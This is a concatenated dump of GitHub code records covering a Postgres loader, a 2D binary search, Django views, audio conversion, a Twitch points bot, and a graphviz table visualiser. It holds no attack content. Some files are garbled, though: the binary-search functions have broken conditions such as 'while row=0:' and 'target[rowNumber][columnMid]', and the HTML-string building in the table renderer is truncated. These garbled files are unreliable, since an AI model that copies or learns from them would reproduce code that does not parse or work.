%(car_id)s, %(city)s, %(country)s, %(rental_company)s, %(cost)s);\n \"\"\", data)\n\n conn.commit()\n\n except Exception as e:\n logging.error(\"Error: Unable to create and populate database\")\n logging.error(e)\n\n logging.info(\"data generated\")\n cur.close()\n conn.close()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n car_data = utils.load_json(\"cars.json\")\n car_info = utils.load_json(\"car-info.json\")\n populate_postgres(car_data, car_info)\n","repo_name":"bee-travels/data-generator","sub_path":"src/car_rental/postgres_upload_data.py","file_name":"postgres_upload_data.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"30636182385","text":"def BinarySearchRowAndColumnSorted(array,target):\n \"\"\"\n The input array is Row-wise and Column-wise sorted.\n Here, we will start checking from 0-th row and last column.\n If that element is equal to target, then return the index.\n If that element is greater than target, then drop that column.\n If that element is less than target, then drop that row.\n \"\"\"\n row=0\n column=len(array[0])-1\n while row=0:\n if array[row][column]==target:\n return [row,column]\n elif array[row][column]>target:\n column-=1\n else:\n row+=1\n return [-1,-1]\n\n\ndef BinarySearchSortedMatrix(array,target):\n \"\"\"\n Initially we will search in the middle column.\n If element is equal to target, then return the index.\n If element is greater than target, then drop the rows below that element.\n If element is less than target, then drop the rows above that element.\n\n Now we will have only two rows.\n\n We will check if the middle column of both the rows, contain the target. If yes, then return the index.\n Else, we will divide them into 4 1D array and then perform normal binary search.\n Part 1: Top row, from 0-th Column to mid-1 column\n Part 2: Top row, from mid+1 Column to last column\n Part 3: Bottom row, from 0-th Column to mid-1 column\n Part 4: Bottom row, from mid+1 Column to last column\n \"\"\"\n rowsCount=len(array)\n columnsCount=len(array[0])\n if rowsCount==0 or columnsCount==0:\n return [-1,-1]\n if rowsCount==1:\n rowNumber=0\n columnStart=0\n columnEnd=columnsCount-1\n else:\n rowStart=0\n rowEnd=rowsCount-1\n columnMid=columnsCount//2\n while rowStartarray[rowMid][columnMid]:\n rowStart=rowMid\n else:\n rowEnd=rowMid\n # Now two rows remaining\n if array[rowStart][columnMid]==target:\n return [rowStart,columnMid]\n if array[rowEnd][columnMid]==target:\n return [rowEnd,columnMid]\n if array[rowStart][0]<=target[rowNumber][columnMid]:\n columnStart=columnMid+1\n else:\n columnEnd=columnMid-1\n return [-1,-1]\n\n\narray1=[[10,20,30,40],\n [15,25,35,45],\n [28,29,37,49],\n [33,34,38,50]]\n\narray2=[[11,12,13,14],\n [15,16,17,18],\n [19,20,21,22],\n [23,24,25,26]]\n\nprint(BinarySearchRowAndColumnSorted(array1,37))\nprint(BinarySearchSortedMatrix(array2,23))","repo_name":"SandipPalit/Data-Structures-and-Algorithms-in-Python","sub_path":"Searching/BinarySearch2D.py","file_name":"BinarySearch2D.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"23343466047","text":"# -*- coding: utf-8 -*-\nfrom json import dumps\n\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import render\nfrom django_middleware_global_request import get_request\n\nfrom system.models.auth import User\n\n\ndef login(request):\n ctx = {\n 'title': '登录',\n }\n user = User.objects.filter(pk=1)\n setattr(request, 'user', {id: 1})\n r = get_request()\n print(r)\n return render(request, 'base.html', ctx)\n\n\ndef register(request):\n raise PermissionDenied\n\n\ndef layout(request):\n ctx = {}\n user = User.objects.filter(pk=1)\n ctx['username'] = '管理员'\n menu_tree = [\n {'id': 1, 'icon': 'layui-icon-home', 'path': 'home', 'label': '首页', 'hasChildren': False,\n 'data': dumps({'id': 1, 'path': 'home', 'label': '首页', 'hasChildren': False})},\n {'id': 2, 'label': '系统管理', 'hasChildren': True,\n 'data': dumps({'id': 2, 'label': '系统管理', 'hasChildren': True}),\n 'children': [\n {'id': 21, 'path': 'user/index', 'label': '用户管理', 'hasChildren': False,\n 'data': dumps({'id': 21, 'path': 'user/index', 'label': '用户管理', 'hasChildren': False})},\n {'id': 22, 'path': 'user/add', 'label': '用户', 'hasChildren': False,\n 'data': dumps({'id': 22, 'path': 'user/add', 'label': '用户', 'hasChildren': False})},\n ]},\n {'id': 3, 'label': '特殊页面', 'hasChildren': True,\n 'data': dumps({'id': 3, 'label': '特殊页面', 'hasChildren': True}),\n 'children': [\n {'id': 403, 'path': '403', 'label': '403', 'hasChildren': False,\n 'data': dumps({'id': 403, 'path': '403', 'label': '403', 'hasChildren': False})},\n {'id': 404, 'path': '404', 'label': '404', 'hasChildren': False,\n 'data': dumps({'id': 404, 'path': '404', 'label': '404', 'hasChildren': False})},\n {'id': 500, 'path': '500', 'label': '500', 'hasChildren': False,\n 'data': dumps({'id': 500, 'path': '500', 'label': '500', 'hasChildren': False})},\n {'id': 502, 'path': '502', 'label': '502', 'hasChildren': False,\n 'data': dumps({'id': 500, 'path': '502', 'label': '502', 'hasChildren': False})},\n ]},\n {},\n ]\n ctx['menuTree'] = menu_tree\n return render(request, 'layout.html', ctx)\n\n\ndef home(request):\n ctx = {'title': 'home'}\n return render(request, 'home.html', ctx)\n\n\ndef page_permission_denied(request):\n return render(request, '403.html', {})\n\n\ndef page_not_found(request):\n return render(request, '404.html', {})\n\n\ndef page_error(request):\n return render(request, '500.html', {})\n","repo_name":"xuelingfei/Worldlet-backend","sub_path":"system/views/auth_views.py","file_name":"auth_views.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36895570378","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import PolynomialFeatures\n\nDF=pd.read_csv(\"D:\\\\Scoala\\\\an3\\\\PYTHON_IA\\\\Fisiere_de_lucru2\\\\LUCRARI_5\\\\salarii_tabel.csv\")\n\nx=DF[\"Nivel\"]\ny=DF[\"Salariu\"]\n\nmodel=np.poly1d(np.polyfit(x,y,4))\nline=np.linspace(1,10,1000000)\n\ntrain_x,train_y,test_x,test_y=train_test_split(x.values,y.values,train_size=0.5,test_size=5)\n\nprint(\"Valori pentru antrenare:\")\nprint(train_x)\nprint(train_y)\n\nprint(\"Valori pentru testare:\")\nprint(test_x)\nprint(test_y)\n\n#Afisare grafic\nplt.title(\"Grafic salarii\")\nplt.scatter(x,y,color=\"blue\")\nplt.plot(line,model(line),color=\"green\")\nplt.xlabel(\"Pozitie\")\nplt.ylabel(\"Salariu\")\n\nplt.subplots()\nplt.title(\"Valori antrenate\")\nplt.scatter(train_x,train_y,color=\"red\")\n\nplt.subplots()\nplt.title(\"Valori testate\")\nplt.scatter(test_x,test_y,color=\"red\")\nplt.show()\n\n\n\n\n\n","repo_name":"AlexMuresan1/AI_Exercises","sub_path":"Lucrarea_5_Exercitiul_2_Muresan_Alexandru.py","file_name":"Lucrarea_5_Exercitiul_2_Muresan_Alexandru.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5570474470","text":"n_inputs = int(input())\nplants = {}\n\nfor _ in range(n_inputs):\n plant_found = input().split('<->')\n plant, rarity = plant_found\n rarity = int(rarity)\n plants[plant] = [rarity]\n\ncommands = input().split(': ')\nwhile commands[0] != 'Exhibition':\n command, others = commands\n if command == 'Rate':\n plant, rating = others.split(' - ')\n rating = int(rating)\n if plant in plants:\n plants[plant].append(rating)\n else:\n print('error')\n\n elif command == 'Update':\n plant, new_rarity = others.split(' - ')\n new_rarity = int(new_rarity)\n if plant in plants:\n plants[plant][0] = new_rarity\n else:\n print('error')\n\n elif command == 'Reset':\n plant = others\n if plant in plants:\n plants[plant] = [plants[plant][0]]\n else:\n print(f'error')\n\n commands = input().split(': ')\n\nprint('Plants for the exhibition:')\nfor plant, statistics in plants.items():\n ratings = statistics[1:]\n length_ratings = len(ratings)\n if length_ratings > 0:\n print(f'- {plant}; Rarity: {statistics[0]}; Rating: {sum(ratings) / length_ratings:.2f}')\n else:\n print(f'- {plant}; Rarity: {statistics[0]}; Rating: {0:.2f}')","repo_name":"Svilkata88/SoftUni_python_fundamentials","sub_path":"final_exam_preparation/03_3_plant_discovery.py","file_name":"03_3_plant_discovery.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2396780366","text":"import subprocess as sp\nimport os\nimport glob\nfrom multiprocessing import Pool\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--src_dir\", type=str)\nparser.add_argument(\"--tgt_dir\", type=str)\nparser.add_argument(\"--tgt_sample_rate\", type=int, default=22050)\nparser.add_argument(\"--move_txt\", action=\"store_true\")\nparser.add_argument(\"--move_jams\", action=\"store_true\")\nargs = parser.parse_args()\n\nfiles = glob.glob(os.path.join(args.src_dir, \"*.wav\"))\nlf = len(files)\nprint(lf)\nTGT_DIR = args.tgt_dir\nSAMPLE_RATE = args.tgt_sample_rate\nif not os.path.exists(TGT_DIR):\n os.makedirs(TGT_DIR)\n\n\ndef process_idx(idx):\n f = files[idx]\n src_txt = f.replace(\".wav\", \".txt\")\n src_jams = f.replace(\".wav\", \".jams\")\n fname = f.split(\"/\")[-1].split(\".\")[0]\n tgt_f = os.path.join(TGT_DIR, \"{}.flac\".format(fname))\n tgt_txt = os.path.join(TGT_DIR, \"{}.txt\".format(fname))\n tgt_jams = os.path.join(TGT_DIR, \"{}.jams\".format(fname))\n command = \"ffmpeg -nostats -loglevel 0 -i '{}' -ac 1 -af aformat=s16:{} '{}'\".format(f, SAMPLE_RATE, tgt_f)\n # print(command)\n if not os.path.exists(tgt_f):\n sp.call(command, shell=True)\n\n if args.move_txt:\n txt_command = \"cp '{}' '{}'\".format(src_txt, tgt_txt)\n if not os.path.exists(tgt_txt):\n sp.call(txt_command, shell=True)\n if args.move_jams:\n jams_command = \"cp '{}' '{}'\".format(src_jams, tgt_jams)\n if not os.path.exists(tgt_jams):\n sp.call(jams_command, shell=True)\n if idx % 1000 == 0:\n print(\"Done {}/{}\".format(idx, lf))\n\n\nif __name__ == '__main__':\n pool = Pool(12)\n o = pool.map_async(process_idx, range(lf))\n res = o.get()\n pool.close()\n pool.join()\n # process_idx(0)\n","repo_name":"SarthakYadav/GISE-51-pytorch","sub_path":"scripts/wav2flac.py","file_name":"wav2flac.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"14110562728","text":"import setuptools\n\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"vmrunPacked\",\n version=\"0.0.6\",\n author=\"William\",\n license=\"MIT\",\n # author_email=\"ganeshanthavasigti1032000@gmail.com\",\n description=\"Using vmrun to Control Virtual Machines. VmWare-vmrun execute actions use python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n # url=\"https://github.com/THAVASIGTI/vmrunPacked.git\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n classifiers=[\n \"Intended Audience :: Developers\",\n \"Intended Audience :: System Administrators\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3',\n)\n","repo_name":"THAVASIGTI/vmrunPacked","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4360528787","text":"from typing import List\n\nfrom twitch_api import TwitchLoyaltyPointRPBot\nfrom loyalty import LoyaltyRedeem\nimport settings\n\n\nclass RedeemBot(TwitchLoyaltyPointRPBot):\n def setup_commands(self):\n self.commands.add('redeems')\n self.commands.add('redeem')\n self.commands.add('redeem_info')\n self.commands.add('points')\n self.commands.add('give')\n self.commands.add('streak')\n self.commands.add('stats')\n\n def setup_redeems(self):\n self.redeem_list['commit'] = LoyaltyRedeem('commit', 'Force me to commit my code.', 100)\n self.redeem_list['hydrate'] = LoyaltyRedeem('hydrate', 'Take a sip of water, or whatever it is I\\'m drinking atm.', 100)\n self.redeem_list['question'] = LoyaltyRedeem('question', 'Ask me a question, anything, and I\\'ll do my best to answer it', 200)\n self.redeem_list['squats'] = LoyaltyRedeem('squats', 'Give me buns of steel! I\\'ll do 10 squats', 1000)\n self.redeem_list['comment'] = LoyaltyRedeem('comment', 'I\\'ll put your comment in my code whatever it is, must be in Twitch\\'s ToS', 1000)\n self.redeem_list['raid'] = LoyaltyRedeem('raid', 'You get to choose the destination for the raid at the end of the stream', 5000)\n self.redeem_list['project'] = LoyaltyRedeem('project', 'I\\'ll do a coding project of your choice, must be within Twitch\\'s ToS', 999999)\n\n def redeems(self, user: str, args: List[str]):\n self.chat('The list of valid redeems is {}, use !redeem_info rname to see what they do!'.format(\n str(list(self.redeem_list.keys()))[1:-1])\n )\n\n def redeem(self, user: str, args: List[str]):\n pnts = self.users[user].points\n if len(args) > 0 and args[0] in self.redeem_list:\n if pnts >= self.redeem_list[args[0]].cost:\n self.chat('@iggy12345101: @{} has redeemed {}'.format(user, args[0]))\n self.users[user].points -= self.redeem_list[args[0]].cost\n else:\n self.chat('@{} Insufficient points.'.format(user))\n else:\n self.chat('@{} That redeem doesn\\'t exist, please use !redeems to see a list of valid redeems'.format(user))\n\n def redeem_info(self, user: str, args: List[str]):\n if len(args) > 0 and args[0] in self.redeem_list:\n r = self.redeem_list[args[0]]\n self.chat('@{} {} x{}: {}'.format(user, r.title, r.cost, r.description))\n else:\n self.chat('@{} That redeem doesn\\'t exist, please use !redeems to see a list of valid redeems'.format(user))\n\n def points(self, user: str, args: List[str]):\n self.chat('@{} you have {} points!'.format(user, self.users[user].points))\n\n def give(self, user: str, args: List[str]):\n if len(args) > 1:\n try:\n target = args[0]\n if target.startswith('@'):\n target = target[1:]\n\n pnts = int(args[1])\n\n if target in self.users:\n self.users[target].points += pnts\n self.chat('Gave {} points from @{} to @{}'.format(pnts, user, target))\n else:\n self.chat('@{} the user @{} doesn\\'t exist, please ensure they have chatted at least once.'.format(\n user, target))\n except ValueError:\n self.chat('@{} that value {} is invalid, please enter a number (0, infinity]'.format(user, args[1]))\n else:\n self.chat('@{} too few arguments supplied, the syntax is !give @target points .'.format(user))\n\n def streak(self, user: str, args: List[str]):\n self.chat('@{} You\\'ve come to {} streams in a row!'.format(user, self.users[user].visit_streak))\n\n def stats(self, user: str, args: List[str]):\n u = self.users[user]\n self.chat('@{} Points: {}, Chats: {}, Streak: {}'.format(user, u.points, u.num_chats, u.visit_streak))\n\n\nif __name__ == '__main__':\n print('Starting automod twitch bot')\n b = RedeemBot(settings.tmi_token, settings.bot_nick, settings.channel)\n b.run()\n\n","repo_name":"aaron-jencks/twitch-moderator-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5768184175","text":"import getopt, sys\n\nargumentList = sys.argv[1:]\n\noptions = \"hmo:\"\n\nlong_options = [\"Help\",\"My_file\",\"output =\"]\n\ntry:\n\n\targuments, values = getopt.getopt(argumentList,options,long_options)\n\n\tfor currentArgument, currentValue in arguments:\n\n\t\t if currentArgument in (\"-h\", \"--Help\"):\n\t\t \tprint (\"Displaying Help\")\n\n\t\t elif currentArgument in (\"-m\", \"--My_file\"):\n\t\t \tprint (\"Displaying file_name:\", sys.argv[0])\n\n\t\t elif currentArgument in (\"-o\", \"--Output\"):\n\t\t \tprint ((\"Enabling special output mode (% s)\") % (currentValue))\n\nexcept getopt.error as err:\n\tprint(str(err))\n","repo_name":"anirudhpendem/Python-Learning","sub_path":"cmd_line_arg/cmd_arg2.py","file_name":"cmd_arg2.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"7972071588","text":"import re\nfrom src.convo_objects.TextEquivalent import TextEquivalent\n\ndef read_and_parse_text_file(full_ass_path, block_text_threshold_seconds):\n\t\"\"\"\n\t:param full_ass_path: path to the file where the text data is\n\t:full_ass_path type: str\n\n\t:param block_text_threshold_seconds: number of seconds between sequential texts for \n\tthem to be considered as \"one\" text. they will be merged. see `merge_sequential_text_equiv()`\n\t:block_text_threshold_seconds type: int\n\n\t:returns: a list of TextEquivalent objects\n\t:rtype: list\n\t\"\"\"\n\ttext_equivs = []\n\n\twith open(full_ass_path,'r') as whole_ass_convo:\n\t\traw_data = whole_ass_convo.readlines()\n\t\ti = 0\n\t\tfor line in raw_data:\n\t\t\t# search for a couple of letters then a colon, before \n\t\t\tsender = re.search(r'^\\w+\\:',line)\n\t\t\t# search for the timestamp in YYYY-MM-DD HH:MM:SS format.\n\t\t\ttimestamp = re.search(r'\\|\\d+\\-\\d+\\-\\d+\\s?\\d+\\:\\d+\\:\\d+',line)\n\t\t\tif sender and timestamp:\n\t\t\t\t# get rid of the identifying colon, last character\n\t\t\t\tsender_name = sender.group()[:-1]\n\t\t\t\t\n\t\t\t\ttimestamp_string = timestamp.group()\n\t\t\t\t# slice the raw input such that sender & timestamp are gone.\n\t\t\t\t# BUG: this includes the colon and space in the text\n\t\t\t\ttext_msg = line[len(sender_name):-len(timestamp_string)-1]\n\t\t\t\t# get rid of the identifier pipe, first character.\n\t\t\t\tte = TextEquivalent(sender_name,timestamp_string[1:],text_msg)\n\t\t\t\t\n\t\t\t\tif i >= 1:\n\t\t\t\t\tte_prev = text_equivs[i-1]\n\t\t\t\t\tdiff = te.timestamp - te_prev.timestamp\n\t\t\t\t\tif (te_prev.sender==te.sender) and (abs(diff.seconds) < block_text_threshold_seconds):\n\t\t\t\t\t\tte_prev.merge_sequential_text_equiv(te)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttext_equivs.append(te)\n\t\t\t\t\t\ti += 1\n\t\t\t\telse:\n\t\t\t\t\ttext_equivs.append(te)\n\t\t\t\t\ti += 1\n\n\treturn text_equivs","repo_name":"weallwegot/conversation-analytics","sub_path":"src/read_parse.py","file_name":"read_parse.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"41661152768","text":"from FunctionalSupport import UnfinishedSelect, Unfinished, UnfinishedSequence, \\\n\t\t\t\t\t\t\t guarded_contains, guarded_compare, indices, base_tokens, tokens_asis\nfrom Support import clean_val\nimport analyse # adds useful functions to all the unfinisheds\nfrom analyse import UnfinishedFunc\nimport os\nfrom copy import copy\nimport string\n\n# fix: in ordering, we always connect bottom FF to top select. but sometimes, there is no FF (if go straight into next select), or there is no rendered select (in special case of full-select)\n\nlayer_color = 'lemonchiffon'\nhead_color = 'bisque' #'yellow'\n\nindices_colour = 'bisque3'\ncomment_colour = 'cornsilk'\nselect_on_colour = 'plum'\nselect_off_colour = head_color\n\ndef windows_path_cleaner(s):\n\tif os.name == \"nt\": # is windows\n\t validchars = \"-_.() \"+string.ascii_letters+string.digits\n\t def fix(c):\n\t \treturn c if c in validchars else \".\"\n\t return \"\".join([fix(c) for c in s])\n\telse:\n\t\treturn s\n\ndef colour_scheme(row_type):\n\tif row_type == INPUT:\n\t\treturn 'gray', 'gray', 'gray'\n\tif row_type == QVAR:\n\t\treturn 'palegreen4','mediumseagreen', 'palegreen1'\n\telif row_type == KVAR:\n\t\treturn 'deepskyblue3','darkturquoise','darkslategray1'\n\telif row_type == VVAR:\n\t\treturn 'palevioletred3','palevioletred2','lightpink'\n\telif row_type == VREAL:\n\t\treturn 'plum4','plum3','thistle2'\t\n\telif row_type == RES:\n\t\treturn 'lightsalmon3','burlywood','burlywood1'\n\telse:\n\t\traise Exception(\"unknown row type: \"+str(row_type))\n\nQVAR, KVAR, VVAR, VREAL, RES, INPUT = [\"QVAR\",\"KVAR\",\"VVAR\",\"VREAL\",\"RES\",\"INPUT\"]\nPOSS_ROWS = [QVAR,KVAR,VVAR,VREAL,RES,INPUT]\nROW_NAMES = {QVAR:\"Me\",KVAR:\"Other\",VVAR:\"X\",VREAL:\"f(X)\",RES:\"FF\",INPUT:\"\"} \n\ndef UnfinishedFunc(f):\n\tsetattr(Unfinished,f.__name__,f)\n\n@UnfinishedFunc\ndef last_val(self):\t\n\treturn self.last_res.get_vals()\n\ndef makeQKStable(qvars,kvars,select,ref_in_g):\n\tqvars = [q.last_val() for q in qvars]\n\tkvars = [k.last_val() for k in kvars]\n\tselect = select.last_val()\n\tq_val_len, k_val_len = len(select), len(select[0])\n\n\tqvars_skip = len(kvars)\n\tkvars_skip = len(qvars)\n\t_, _, qvars_colour = colour_scheme(QVAR)\n\t_, _, kvars_colour = colour_scheme(KVAR)\n\t# select has qvars along the rows and kvars along the columns, so we'll do the same.\n\t# i.e. top rows will just be the kvars and first columns will just be the qvars\n\t# if (not qvars) and (not kvars): # no qvars or kvars -> full select -> dont waste space drawing\n\t# \tnum_rows, num_columns = 0, 0\n\t# \tpass\n\t# else:\n\t# \tnum_rows = qvars_skip+(len(qvars[0]) if qvars else 1)\n\t# \tnum_columns = kvars_skip+(len(kvars[0]) if kvars else 1)\n\tnum_rows = qvars_skip+q_val_len\n\tnum_columns = kvars_skip+k_val_len\n\n\tselect_cells = {i:[CellVals('',head_color,j,i) for j in range(num_columns)] \\\n\t\t\t\t\t\tfor i in range(num_rows)}\n\n\n\tfor i,seq in enumerate(kvars):\n\t\tfor j,v in enumerate(seq):\n\t\t\tselect_cells[i][j+kvars_skip] = CellVals(v,kvars_colour,i,j+kvars_skip)\n\tfor j,seq in enumerate(qvars):\n\t\tfor i,v in enumerate(seq):\n\t\t\tselect_cells[i+qvars_skip][j] = CellVals(v,qvars_colour,i+qvars_skip,j)\n\t\n\tfor i in range(num_rows-qvars_skip): # i goes over the q_var values\n\t\tfor j in range(num_columns-kvars_skip): # j goes over the k_var values\n\t\t\tv = select[i][j]\n\t\t\tcolour = select_on_colour if v else select_off_colour\n\t\t\tselect_cells[i+qvars_skip][j+kvars_skip] = CellVals(v,colour,i+qvars_skip,j+kvars_skip,select_internal=True)\n\n\t# TODO: make an ugly little q\\k triangle thingy in the top corner\n\treturn GridTable(select_cells,ref_in_g)\n\nclass CellVals:\n\tdef __init__(self,val,colour,i_row,i_col,select_internal=False,known_portstr=None):\n\t\tdef mystr(v):\n\t\t\tif isinstance(v,bool):\n\t\t\t\tif select_internal:\n\t\t\t\t\treturn ' ' if v else ' ' # color gives it all!\n\t\t\t\telse:\n\t\t\t\t\treturn 'T' if v else 'F'\n\t\t\tif isinstance(v,float):\n\t\t\t\tv = clean_val(v,3)\n\t\t\tif isinstance(v,int) and len(str(v))==1:\n\t\t\t\tv = \" \"+str(v) # for pretty square selectors\n\t\t\treturn str(v).replace(\"<\",\"<\").replace(\">\",\">\")\n\t\tself.val = mystr(val)\n\t\tself.colour = colour\n\t\tif None is known_portstr:\n\t\t\tself.portstr = \"_col\"+str(i_col)+\"_row\"+str(i_row)\n\t\telse:\n\t\t\tself.portstr = known_portstr\n\tdef __str__(self):\n\t\treturn ''+self.val+''\n\n\nclass GridTable:\n\tdef __init__(self,cellvals,ref_in_g):\n\t\tself.ref_in_g = ref_in_g\n\t\tself.cellvals = cellvals\n\t\tself.numcols = len(cellvals.get(0,[]))\n\t\tself.numrows = len(cellvals)\n\t\tself.empty = 0 in [self.numcols,self.numrows]\n\tdef to_str(self,transposed=False):\n\t\tii = sorted(list(self.cellvals.keys()))\n\t\trows = [self.cellvals[i] for i in ii]\n\t\tdef cells2row(cells):\n\t\t\treturn ''+''.join(map(str,cells))+''\n\t\treturn '<'+''.join(map(cells2row,rows))+'
    >'\n\tdef bottom_left_portstr(self):\n\t\treturn self.access_portstr(0,-1)\n\tdef bottom_right_portstr(self):\n\t\treturn self.access_portstr(-1,-1)\n\tdef top_left_portstr(self):\n\t\treturn self.access_portstr(0,0)\n\tdef top_right_portstr(self):\n\t\treturn self.access_portstr(-1,0)\n\tdef top_access_portstr(self,i_col):\n\t\treturn self.access_portstr(i_col,0)\n\tdef bottom_access_portstr(self,i_col):\n\t\treturn self.access_portstr(i_col,-1)\n\tdef access_portstr(self,i_col,i_row):\n\t\treturn self.ref_in_g + \":\" + self.internal_portstr(i_col,i_row)\n\tdef internal_portstr(self,i_col,i_row):\n\t\tif i_col < 0:\n\t\t\ti_col = self.numcols + i_col\n\t\tif i_row < 0:\n\t\t\ti_row = self.numrows + i_row\t\n\t\treturn \"_col\"+str(i_col)+\"_row\"+str(i_row)\n\tdef add_to_graph(self,g):\n\t\tif self.empty:\n\t\t\tpass\n\t\telse:\n\t\t\tg.node(name=self.ref_in_g,shape='none',margin='0',label=self.to_str())\n\nclass Table:\n\tdef __init__(self,seqs_by_rowtype,ref_in_g,rowtype_order=[]):\n\t\tself.ref_in_g = ref_in_g\n\t\t\t# consistent presentation, and v useful for feedforward clarity\n\t\tself.rows = []\n\t\tself.seq_index = {}\n\t\tif len(rowtype_order)>1:\n\t\t\tself.add_rowtype_cell = True\n\t\telse:\n\t\t\tassert len(seqs_by_rowtype.keys()) == 1, \"table got multiple row types but no order for them\"\n\t\t\trowtype_order = list(seqs_by_rowtype.keys())\n\t\t\tself.add_rowtype_cell = not (rowtype_order[0] == RES)\n\t\tself.note_res_dependencies = len(seqs_by_rowtype.get(RES,[]))>1\n\t\tself.leading_metadata_offset = 1 + self.add_rowtype_cell\n\t\tfor rt in rowtype_order:\n\t\t\tseqs = sorted(seqs_by_rowtype[rt],key=lambda seq:seq.creation_order_id)\n\t\t\tfor i,seq in enumerate(seqs): \n\t\t\t\tself.n = self.add_row(seq,rt) # each one appends to self.rows. \n\t\t\t\t# self.n stores length of a single row, they will all be the same, \n\t\t\t\t# just easiest to get like this\n\t\t\t\t# add_row has to happen one at a time b/c they care about length of \n\t\t\t\t# self.rows at time of addition (to get ports right)\n\t\tself.empty = len(self.rows)==0\n\t\tif self.empty:\n\t\t\tself.n = 0\n\t\tself.transpose = False # (len(rowtype_order)==1 and rowtype_order[0]==QVAR)\n\t\t# no need to twist Q, just making the table under anyway\n\t\t# transpose affects the port accesses, but think about that later\n\tdef to_str(self):\n\t\trows = self.rows if not self.transpose else list(zip(*self.rows))\n\t\tdef cells2row(cells):\n\t\t\treturn ''+''.join(cells)+''\n\t\treturn '<'+''.join(map(cells2row,rows))+'
    >'\n\tdef bottom_left_portstr(self):\n\t\treturn self.access_portstr(0,-1)\n\tdef bottom_right_portstr(self):\n\t\treturn self.access_portstr(-1,-1)\n\tdef top_left_portstr(self):\n\t\treturn self.access_portstr(0,0)\n\tdef top_right_portstr(self):\n\t\treturn self.access_portstr(-1,0)\n\tdef top_access_portstr(self,i_col,skip_meta=False):\n\t\treturn self.access_portstr(i_col,0,skip_meta=skip_meta)\n\tdef bottom_access_portstr(self,i_col,skip_meta=False):\n\t\treturn self.access_portstr(i_col,-1,skip_meta=skip_meta)\n\tdef access_portstr(self,i_col,i_row,skip_meta=False):\n\t\treturn self.ref_in_g + \":\" + self.internal_portstr(i_col,i_row,skip_meta=skip_meta)\n\tdef internal_portstr(self,i_col,i_row,skip_meta=False):\n\t\tif skip_meta and (i_col >= 0): # before flip things for reverse column access\n\t\t\ti_col += self.leading_metadata_offset\n\t\tif i_col < 0:\n\t\t\ti_col = (self.n) + i_col\n\t\tif i_row < 0:\n\t\t\ti_row = len(self.rows) + i_row\t\n\t\treturn \"_col\"+str(i_col)+\"_row\"+str(i_row)\n\tdef add_row(self,seq,row_type):\n\t\tdef add_cell(val,colour):\n\t\t\tres = CellVals(val,colour,-1,-1,\n\t\t\t\t\tknown_portstr=self.internal_portstr(len(cells),len(self.rows)))\n\t\t\tcells.append(str(res))\n\n\t\tdef add_strong_line():\n\t\t\t# after failing to inject css styles in graphviz,\n\t\t\t# seeing that their suggestion only creates lines (if at all? unclear) of \n\t\t\t# width 1 (same as the border already there) and it wont make multiple VRs,\n\t\t\t# and realising their suggestion also does nothing,\n\t\t\t# refer to hack at the top of this priceless page:\n\t\t\t# http://jkorpela.fi/html/cellborder.html\n\t\t\tcells.append('')\n\n\t\tqkvr_colour, name_colour, data_colour = colour_scheme(row_type)\n\t\tcells = [] # has to be created in advance, and not just be all the results of add_cell, \n\t\t# because add_cell cares about current length of 'cells'\n\t\tif self.add_rowtype_cell:\n\t\t\tadd_cell(ROW_NAMES[row_type],qkvr_colour)\n\t\tadd_cell(seq.name,name_colour)\n\t\tfor v in seq.last_val():\n\t\t\tadd_cell(v,data_colour)\n\t\tif self.note_res_dependencies:\n\t\t\tself.seq_index[seq] = len(self.rows)\n\t\t\tadd_strong_line()\n\t\t\tadd_cell(\"(\"+str(self.seq_index[seq])+\")\",indices_colour)\n\t\t\tadd_cell(self.dependencies_str(seq,row_type),comment_colour)\n\t\tself.rows.append(cells)\n\t\treturn len(cells)\n\n\tdef dependencies_str(self,seq,row_type):\n\t\tif not row_type == RES:\n\t\t\treturn \"\"\n\t\treturn \"from (\"+\", \".join(str(self.seq_index[m]) for m in seq.get_nonminor_parent_sequences()) +\")\"\n\n\tdef add_to_graph(self,g):\n\t\tif self.empty:\n\t\t\t# g.node(name=self.ref_in_g,label=\"empty table\")\n\t\t\tpass\n\t\telse:\n\t\t\tg.node(name=self.ref_in_g,shape='none',margin='0',label=self.to_str())\n\ndef place_above(g,node1,node2):\n\n\tg.edge(node1.bottom_left_portstr(),node2.top_left_portstr(),style=\"invis\")\n\tg.edge(node1.bottom_right_portstr(),node2.top_right_portstr(),style=\"invis\")\n\ndef 